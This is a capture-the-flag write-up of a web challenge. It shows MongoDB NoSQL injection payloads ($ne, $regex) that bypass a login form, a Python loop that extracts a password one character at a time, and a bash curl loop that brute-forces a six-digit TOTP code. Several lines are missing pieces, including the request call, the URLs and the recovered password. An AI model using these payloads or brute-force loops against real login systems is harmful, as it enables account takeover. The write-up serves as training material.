Sadly, because of some infrastructure downtime during CTF, I didn’t manage to finish the TOTP part. However, I solved the first part (NoSQL).


So, we had a webpage with some login form, playing with it shows that submitting a logging request was asking (https://nosql-totp.fic2k18.ctf/sender.php) to validate.

The payload was like :

{"username": "someuser", "password": "somepassword"}

We know there is some nosql vulnerability, so we first tried Mongo, with something like:

{"username": {"$ne": "foo"}, "password": {"$ne": "bar" }}

and we got OK \o/. So we have some oracle to guess the username and password.

$regex to the rescue, we can find each char one by one. Following code is to BF password, same was used for username:

#!/usr/bin/env python

import requests
import urllib3
import string
import urllib


user="Barry Allen"

while True:
    for c in string.printable:
        if c not in ['*','+','.','?','|']:
            payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (user, password + c)
            r =, data = {'ids': payload}, verify = False)
            if 'OK' in r.text:
                print("Found one more char : %s" % (password+c))
                password += c

After a few minutes, we got :


We then logged in, and saw the site was asking for a TOTP (One time password). We didn’t get the private key or whatever, however looking in TOTP/ directory (thanks to the url) we found that has been used.

So likely the OTP is a six digits number, valid for 30 seconds. And once again we had an oracle sending ‘0’ if the TOTP was invalid (and so we guess ‘1’ if it is valid). You can try as many OTP as you want, given they change every 30s. There are ~ 999999 possibilities so you may still get the good value after some reasonable time.

Based on this, we should be able to:

I bruteforced it with some stupid curl (starting at 100000 because I was too lazy to format it correctly):

ret=0; i=100000; while [ $ret -eq 0 ];do ret=$(curl -s -H 'Cookie: PHPSESSID=XXXXXXXXXX' --data "totp_code=${i}"); echo "$ret : $i"; i=$((i+1)) ;done

After the infrastructure came back, I started to bruteforce a bit, and at some point got this 1 I was waiting for.

Sadly, I was working on some other challenge and see it returned way too late :(